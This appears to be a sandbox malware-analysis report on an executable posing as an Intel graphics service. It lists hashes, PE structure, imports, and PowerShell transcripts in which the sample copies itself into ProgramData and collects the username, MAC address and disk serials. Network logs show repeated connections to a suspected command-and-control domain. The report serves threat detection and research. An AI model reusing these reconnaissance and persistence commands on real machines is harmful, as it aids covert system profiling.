                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: 1
                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mnb3nmgl.fjp.ps1
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: 1
                                        C:\Users\user\Documents\20220111\PowerShell_transcript.216554.4pmPLteW.20220111170842.txt
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1069
                                        Entropy (8bit):5.153986935727605
                                        Encrypted:false
                                        SSDEEP:24:BxSAti7vBZdx2DOXUWMBvVWJHjeTKKjX4CIym1ZJXfBHnxSAZYC:BZyvjdoOsBEJqDYB1ZFBHZZYC
                                        MD5:CB53789CC714A667E74029088F9F50D9
                                        SHA1:1016B1A69BC411BF621C3905B0CA9DF3D593227E
                                        SHA-256:70FCB885A559453BB65973F7445C38C3D3484D769BDB36848F371E158859C921
                                        SHA-512:309984E6C9A3166CACA27655E50D2CB61EAFC60040A734CD5581A90BE3DF54A5A359FFEB26F05326294C187525972600AEC0C5FE5AB54F4FE454358869CB90EA
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20220111170843..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216554 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt'..Process ID: 6036..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220111170843..**********************..PS>$env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt'..**********************..Command start time: 20220111170950..**********************..PS>$global:?..True..**********************..Windows PowerShe
                                        C:\Users\user\Documents\20220111\PowerShell_transcript.216554.b7XBSQRk.20220111170801.txt
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1295
                                        Entropy (8bit):5.232215887354239
                                        Encrypted:false
                                        SSDEEP:24:BxSAd7vBZdx2DOXUWKYcdVWMHjeTKKjX4CIym1ZJXSYcvnxSAZl:BZpvjdoOqYceMqDYB1ZgYcfZZl
                                        MD5:CB0D3D5F1E80B3212CC0E595E1F88CFA
                                        SHA1:6441596A3D97022570DB0AE770E072C9BAE20890
                                        SHA-256:C11ADC0C743355B67BB54EADFEE176C636E6BDF9AE9E969F94F15DAB699D2176
                                        SHA-512:9678081F48381CF90E0047582EF057E5C534741B604F27AF46B7D4C35881FBAE95ACA305705DA0C0ACFE3BA7563A1D28D90E55DB8D3E6FB702B7DA59C271CE63
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20220111170813..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216554 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'..Process ID: 6936..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220111170813..**********************..PS>getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get Se
                                        C:\Users\user\Documents\20220111\PowerShell_transcript.216554.xGYTF23B.20220111170730.txt
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1095
                                        Entropy (8bit):5.197389475553531
                                        Encrypted:false
                                        SSDEEP:24:BxSAC7vBZdx2DOXUW8G0MIEWGHjeTKKjX4CIym1ZJXF0MIEnxSAZAi:BZ4vjdoOQGqDYB1ZnZZR
                                        MD5:994B8D8B3075A242315AED192D83D2AC
                                        SHA1:A137B4E0806E3500A3A36EAB88B5A414C61AA0BE
                                        SHA-256:77A42411AACC74613BBBF71DE55F1741080044C8B74B63D945EB21155FD86791
                                        SHA-512:8426F2768AB355B4AA95B73C4417967A4D3D09A543AA53C07BB28952877779CA51065CB48F5691090DD1EFD2B00A1F826E4A06AE1FCE793C898D67CC42F743FA
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20220111170742..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216554 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe copy 'C:\Users\user\Desktop\IGFXCUISERVICE.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe'..Process ID: 3160..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220111170743..**********************..PS>copy 'C:\Users\user\Desktop\IGFXCUISERVICE.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe'..**********************..Command start time: 20220111171155..**********************..PS>$global:?..True..**************

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):6.560987668019584
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:IGFXCUISERVICE.exe
                                        File size:401920
                                        MD5:d90d0f4d6dad402b5d025987030cc87c
                                        SHA1:fad66bdf5c5dc2c050cbc574832c6995dba086a0
                                        SHA256:1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c
                                        SHA512:c2faeacfd588585633630ad710f443a72c7617c2d5e37dbfe43570e6ac5904e4b81eb682356a48a93bb794ef5e9d8ad0d673966d57798079b4de62ea61241024
                                        SSDEEP:12288:m00VdXicNHeft0d/BiqpD9JD9lusIhAzhM2RdM:mrzXiu+FZqp72iDc
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@........................@...N.......N.......N...............................g.......g.R.....g.......Rich...................

                                        File Icon

                                        Icon Hash:00828e8e8686b000

                                        Static PE Info

                                        General

                                        Entrypoint:0x424dcb
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                        DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                        Time Stamp:0x61312A62 [Thu Sep 2 19:47:46 2021 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:6
                                        OS Version Minor:0
                                        File Version Major:6
                                        File Version Minor:0
                                        Subsystem Version Major:6
                                        Subsystem Version Minor:0
                                        Import Hash:86f89939b4b0c19157649ce986ae170e

                                        Entrypoint Preview

                                        Instruction
                                        call 00007F9EE8E1158Fh
                                        jmp 00007F9EE8E10EEFh
                                        push ebp
                                        mov ebp, esp
                                        sub esp, 00000324h
                                        push ebx
                                        push 00000017h
                                        call 00007F9EE8E32094h
                                        test eax, eax
                                        je 00007F9EE8E11077h
                                        mov ecx, dword ptr [ebp+08h]
                                        int 29h
                                        push 00000003h
                                        call 00007F9EE8E11249h
                                        mov dword ptr [esp], 000002CCh
                                        lea eax, dword ptr [ebp-00000324h]
                                        push 00000000h
                                        push eax
                                        call 00007F9EE8E1342Ah
                                        add esp, 0Ch
                                        mov dword ptr [ebp-00000274h], eax
                                        mov dword ptr [ebp-00000278h], ecx
                                        mov dword ptr [ebp-0000027Ch], edx
                                        mov dword ptr [ebp-00000280h], ebx
                                        mov dword ptr [ebp-00000284h], esi
                                        mov dword ptr [ebp-00000288h], edi
                                        mov word ptr [ebp-0000025Ch], ss
                                        mov word ptr [ebp-00000268h], cs
                                        mov word ptr [ebp-0000028Ch], ds
                                        mov word ptr [ebp-00000290h], es
                                        mov word ptr [ebp-00000294h], fs
                                        mov word ptr [ebp-00000298h], gs
                                        pushfd
                                        pop dword ptr [ebp-00000264h]
                                        mov eax, dword ptr [ebp+04h]
                                        mov dword ptr [ebp-0000026Ch], eax
                                        lea eax, dword ptr [ebp+04h]
                                        mov dword ptr [ebp-00000260h], eax
                                        mov dword ptr [ebp-00000324h], 00010001h
                                        mov eax, dword ptr [eax-04h]
                                        push 00000050h
                                        mov dword ptr [ebp-00000270h], eax
                                        lea eax, dword ptr [ebp-58h]
                                        push 00000000h
                                        push eax
                                        call 00007F9EE8E133A0h

                                        Data Directories

                                        Name | Virtual Address | Virtual Size | Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5d4bc | 0x78 | .rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x61000 | 0x3b8 | .rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x62000 | 0x38d4 | .reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x585d0 | 0x1c | .rdata
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x586c0 | 0x18 | .rdata
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x585f0 | 0x40 | .rdata
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x4a000 | 0x1dc | .rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                        Sections

                                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                        .text | 0x1000 | 0x48ddb | 0x48e00 | False | 0.509323408019 | data | 6.57262184076 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .rdata | 0x4a000 | 0x13f90 | 0x14000 | False | 0.460668945313 | data | 5.42470846624 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data | 0x5e000 | 0x21d0 | 0x1200 | False | 0.26953125 | data | 3.95317799649 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                        .rsrc | 0x61000 | 0x3b8 | 0x400 | False | 0.4111328125 | data | 3.18893503216 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc | 0x62000 | 0x38d4 | 0x3a00 | False | 0.670999461207 | data | 6.52552513001 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        Name | RVA | Size | Type | Language | Country
                                        RT_VERSION | 0x61060 | 0x354 | data | English | United States

                                        Imports

                                        DLL | Import
                                        KERNEL32.dll | CreateDirectoryW, SizeofResource, HeapFree, GetModuleFileNameW, InitializeCriticalSectionEx, WaitForSingleObject, HeapSize, MultiByteToWideChar, Sleep, GetLastError, LockResource, DeleteFileW, GlobalFree, HeapReAlloc, RaiseException, FindResourceExW, LoadResource, FindResourceW, HeapAlloc, DecodePointer, HeapDestroy, DeleteCriticalSection, GetProcessHeap, WideCharToMultiByte, SleepEx, WriteConsoleW, CreateFileW, SetStdHandle, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, ReadConsoleW, ReadFile, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetFileType, SetFilePointerEx, CloseHandle, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, SetEvent, ResetEvent, WaitForSingleObjectEx, CreateEventW, GetModuleHandleW, GetProcAddress, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, EncodePointer, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, CompareStringW, LCMapStringW, GetLocaleInfoW, GetStringTypeW, GetCPInfo, OutputDebugStringW, RtlUnwind, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetStdHandle, WriteFile, GetFileSizeEx, SetEndOfFile
                                        SHELL32.dll | ShellExecuteW, ShellExecuteExW
                                        ole32.dll | CoCreateInstance, CoUninitialize, CoInitialize
                                        OLEAUT32.dll | SysAllocStringLen
                                        WINHTTP.dll | WinHttpGetIEProxyConfigForCurrentUser, WinHttpGetProxyForUrl, WinHttpWriteData, WinHttpReadData, WinHttpSetTimeouts, WinHttpCloseHandle, WinHttpCrackUrl, WinHttpQueryDataAvailable, WinHttpQueryHeaders, WinHttpAddRequestHeaders, WinHttpOpen, WinHttpSetOption, WinHttpConnect, WinHttpReceiveResponse, WinHttpOpenRequest, WinHttpSendRequest

                                        Version Infos

                                        Description | Data
                                        LegalCopyright | Copyright 2012-2015, Intel Corporation
                                        InternalName | IGFXCUISERVICE
                                        FileVersion | 6.15.10.5063
                                        CompanyName | Intel Corporation
                                        ProductName | Intel(R) Common User Interface
                                        ProductVersion | 6.15.10.5063
                                        FileDescription | igfxCUIService Module
                                        OriginalFilename | IGFXCUISERVICE.EXE
                                        Translation | 0x0409 0x04b0

                                        Possible Origin

                                        Language of compilation system | Country where language is spoken | Map
                                        English | United States |

                                        Network Behavior

                                        Snort IDS Alerts

                                        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                        01/11/22-17:09:03.570407 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 52991 | 8.8.8.8 | 192.168.2.4
                                        01/11/22-17:09:04.436781 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 53700 | 8.8.8.8 | 192.168.2.4
                                        01/11/22-17:09:06.141153 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 56794 | 8.8.8.8 | 192.168.2.4
                                        01/11/22-17:09:07.761800 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 56627 | 8.8.8.8 | 192.168.2.4
                                        01/11/22-17:09:12.354822 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 61721 | 8.8.8.8 | 192.168.2.4
                                        01/11/22-17:09:14.722075 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 52337 | 8.8.8.8 | 192.168.2.4

                                        Network Port Distribution

                                        TCP Packets

                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Jan 11, 2022 17:09:02.371689081 CET | 49792 | 443 | 192.168.2.4 | 142.250.181.238
                                        Jan 11, 2022 17:09:02.371745110 CET | 443 | 49792 | 142.250.181.238 | 192.168.2.4
                                        Jan 11, 2022 17:09:02.371881008 CET | 49792 | 443 | 192.168.2.4 | 142.250.181.238
                                        Jan 11, 2022 17:09:02.379396915 CET | 49792 | 443 | 192.168.2.4 | 142.250.181.238
                                        Jan 11, 2022 17:09:02.379431963 CET | 443 | 49792 | 142.250.181.238 | 192.168.2.4
                                        Jan 11, 2022 17:09:02.428991079 CET | 443 | 49792 | 142.250.181.238 | 192.168.2.4
                                        Jan 11, 2022 17:09:02.429286003 CET | 49792 | 443 | 192.168.2.4 | 142.250.181.238
                                        Jan 11, 2022 17:09:02.430577993 CET | 443 | 49792 | 142.250.181.238 | 192.168.2.4
                                        Jan 11, 2022 17:09:02.430655956 CET | 49792 | 443 | 192.168.2.4 | 142.250.181.238
                                        Jan 11, 2022 17:09:02.435116053 CET | 49792 | 443 | 192.168.2.4 | 142.250.181.238
                                        Jan 11, 2022 17:09:02.435133934 CET | 443 | 49792 | 142.250.181.238 | 192.168.2.4
                                        Jan 11, 2022 17:09:02.435554028 CET | 443 | 49792 | 142.250.181.238 | 192.168.2.4
                                        Jan 11, 2022 17:09:02.489445925 CET | 49792 | 443 | 192.168.2.4 | 142.250.181.238
                                        Jan 11, 2022 17:09:02.671390057 CET | 49792 | 443 | 192.168.2.4 | 142.250.181.238
                                        Jan 11, 2022 17:09:02.713887930 CET | 443 | 49792 | 142.250.181.238 | 192.168.2.4
                                        Jan 11, 2022 17:09:02.990456104 CET | 443 | 49792 | 142.250.181.238 | 192.168.2.4
                                        Jan 11, 2022 17:09:02.990606070 CET | 443 | 49792 | 142.250.181.238 | 192.168.2.4
                                        Jan 11, 2022 17:09:02.990678072 CET | 49792 | 443 | 192.168.2.4 | 142.250.181.238
                                        Jan 11, 2022 17:09:02.992429972 CET | 49792 | 443 | 192.168.2.4 | 142.250.181.238
                                        Jan 11, 2022 17:09:02.992456913 CET | 443 | 49792 | 142.250.181.238 | 192.168.2.4
                                        Jan 11, 2022 17:09:03.027376890 CET | 49793 | 443 | 192.168.2.4 | 142.250.185.129
                                        Jan 11, 2022 17:09:03.027432919 CET | 443 | 49793 | 142.250.185.129 | 192.168.2.4
                                        Jan 11, 2022 17:09:03.027518988 CET | 49793 | 443 | 192.168.2.4 | 142.250.185.129
                                        Jan 11, 2022 17:09:03.028232098 CET | 49793 | 443 | 192.168.2.4 | 142.250.185.129
                                        Jan 11, 2022 17:09:03.028248072 CET | 443 | 49793 | 142.250.185.129 | 192.168.2.4
                                        Jan 11, 2022 17:09:03.080574989 CET | 443 | 49793 | 142.250.185.129 | 192.168.2.4
                                        Jan 11, 2022 17:09:03.080775976 CET | 49793 | 443 | 192.168.2.4 | 142.250.185.129
                                        Jan 11, 2022 17:09:03.082027912 CET | 443 | 49793 | 142.250.185.129 | 192.168.2.4
                                        Jan 11, 2022 17:09:03.082200050 CET | 49793 | 443 | 192.168.2.4 | 142.250.185.129
                                        Jan 11, 2022 17:09:03.086714983 CET | 49793 | 443 | 192.168.2.4 | 142.250.185.129
                                        Jan 11, 2022 17:09:03.086734056 CET | 443 | 49793 | 142.250.185.129 | 192.168.2.4
                                        Jan 11, 2022 17:09:03.087172031 CET | 443 | 49793 | 142.250.185.129 | 192.168.2.4
                                        Jan 11, 2022 17:09:03.094774008 CET | 49793 | 443 | 192.168.2.4 | 142.250.185.129
                                        Jan 11, 2022 17:09:03.137881041 CET | 443 | 49793 | 142.250.185.129 | 192.168.2.4
                                        Jan 11, 2022 17:09:03.279567003 CET | 443 | 49793 | 142.250.185.129 | 192.168.2.4
                                        Jan 11, 2022 17:09:03.279789925 CET | 49793 | 443 | 192.168.2.4 | 142.250.185.129
                                        Jan 11, 2022 17:09:03.279938936 CET | 443 | 49793 | 142.250.185.129 | 192.168.2.4
                                        Jan 11, 2022 17:09:03.280014992 CET | 443 | 49793 | 142.250.185.129 | 192.168.2.4
                                        Jan 11, 2022 17:09:03.280123949 CET | 49793 | 443 | 192.168.2.4 | 142.250.185.129
                                        Jan 11, 2022 17:09:03.282025099 CET | 49793 | 443 | 192.168.2.4 | 142.250.185.129
                                        Jan 11, 2022 17:09:03.282057047 CET | 443 | 49793 | 142.250.185.129 | 192.168.2.4
                                        Jan 11, 2022 17:09:03.282135010 CET | 49793 | 443 | 192.168.2.4 | 142.250.185.129
                                        Jan 11, 2022 17:09:03.282145023 CET | 443 | 49793 | 142.250.185.129 | 192.168.2.4
                                        Jan 11, 2022 17:09:03.572076082 CET | 49795 | 443 | 192.168.2.4 | 23.254.131.176
                                        Jan 11, 2022 17:09:03.572129965 CET | 443 | 49795 | 23.254.131.176 | 192.168.2.4
                                        Jan 11, 2022 17:09:03.572237968 CET | 49795 | 443 | 192.168.2.4 | 23.254.131.176
                                        Jan 11, 2022 17:09:03.572891951 CET | 49795 | 443 | 192.168.2.4 | 23.254.131.176
                                        Jan 11, 2022 17:09:03.572920084 CET | 443 | 49795 | 23.254.131.176 | 192.168.2.4
                                        Jan 11, 2022 17:09:03.873447895 CET | 443 | 49795 | 23.254.131.176 | 192.168.2.4
                                        Jan 11, 2022 17:09:03.873626947 CET | 49795 | 443 | 192.168.2.4 | 23.254.131.176
                                        Jan 11, 2022 17:09:03.877026081 CET | 49795 | 443 | 192.168.2.4 | 23.254.131.176
                                        Jan 11, 2022 17:09:03.877057076 CET | 443 | 49795 | 23.254.131.176 | 192.168.2.4
                                        Jan 11, 2022 17:09:03.878128052 CET | 443 | 49795 | 23.254.131.176 | 192.168.2.4
                                        Jan 11, 2022 17:09:03.882194996 CET | 49795 | 443 | 192.168.2.4 | 23.254.131.176
                                        Jan 11, 2022 17:09:03.882379055 CET | 49795 | 443 | 192.168.2.4 | 23.254.131.176
                                        Jan 11, 2022 17:09:03.882411957 CET | 443 | 49795 | 23.254.131.176 | 192.168.2.4
                                        Jan 11, 2022 17:09:04.215424061 CET | 443 | 49795 | 23.254.131.176 | 192.168.2.4
                                        Jan 11, 2022 17:09:04.215512037 CET | 443 | 49795 | 23.254.131.176 | 192.168.2.4
                                        Jan 11, 2022 17:09:04.215770960 CET | 49795 | 443 | 192.168.2.4 | 23.254.131.176
                                        Jan 11, 2022 17:09:04.217407942 CET | 49795 | 443 | 192.168.2.4 | 23.254.131.176
                                        Jan 11, 2022 17:09:04.217427015 CET | 443 | 49795 | 23.254.131.176 | 192.168.2.4
                                        Jan 11, 2022 17:09:04.217547894 CET | 49795 | 443 | 192.168.2.4 | 23.254.131.176
                                        Jan 11, 2022 17:09:04.217556953 CET | 443 | 49795 | 23.254.131.176 | 192.168.2.4
                                        Jan 11, 2022 17:09:04.440031052 CET | 49796 | 443 | 192.168.2.4 | 23.254.131.176
                                        Jan 11, 2022 17:09:04.440090895 CET | 443 | 49796 | 23.254.131.176 | 192.168.2.4
                                        Jan 11, 2022 17:09:04.440860033 CET49796443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:04.448390007 CET49796443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:04.448424101 CET4434979623.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:04.726950884 CET4434979623.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:04.727046967 CET49796443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:04.730498075 CET49796443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:04.730513096 CET4434979623.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:04.730879068 CET4434979623.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:04.734407902 CET49796443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:04.734662056 CET49796443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:04.734698057 CET4434979623.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:05.037564993 CET4434979623.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:05.037647963 CET4434979623.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:05.037744045 CET49796443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:05.038280964 CET49796443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:05.038307905 CET4434979623.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:05.317503929 CET49797443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:05.317557096 CET4434979723.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:05.317646980 CET49797443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:05.318630934 CET49797443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:05.318649054 CET4434979723.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:05.597059965 CET4434979723.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:05.597151995 CET49797443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:05.600259066 CET49797443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:05.600277901 CET4434979723.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:05.600650072 CET4434979723.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:05.602484941 CET49797443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:05.602760077 CET49797443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:05.602807045 CET4434979723.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:05.917922020 CET4434979723.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:05.918008089 CET4434979723.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:05.918095112 CET49797443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:05.918487072 CET49797443192.168.2.423.254.131.176
                                        Jan 11, 2022 17:09:05.918507099 CET4434979723.254.131.176192.168.2.4
                                        Jan 11, 2022 17:09:05.918586016 CET49797443192.168.2.423.254.131.176

                                        UDP Packets

                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP

                                        DNS Queries

                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class

                                        DNS Answers

                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                        Jan 11, 2022 17:09:27.347227097 CET8.8.8.8192.168.2.40xee09No error (0)drive.google.com142.250.181.238A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:27.422432899 CET8.8.8.8192.168.2.40x7e7No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:27.907330036 CET8.8.8.8192.168.2.40x90c8No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:28.614734888 CET8.8.8.8192.168.2.40xa4feNo error (0)doc-0k-2o-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                        Jan 11, 2022 17:09:28.614734888 CET8.8.8.8192.168.2.40xa4feNo error (0)googlehosted.l.googleusercontent.com142.250.185.129A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:29.018321991 CET8.8.8.8192.168.2.40xea76No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:29.084435940 CET8.8.8.8192.168.2.40x3264No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:29.688075066 CET8.8.8.8192.168.2.40xc799No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:29.882123947 CET8.8.8.8192.168.2.40x3bbeNo error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:29.957529068 CET8.8.8.8192.168.2.40x92b1No error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
                                        Jan 11, 2022 17:09:30.521503925 CET8.8.8.8192.168.2.40x9e5bNo error (0)graphic-updater.com23.254.131.176A (IP address)IN (0x0001)
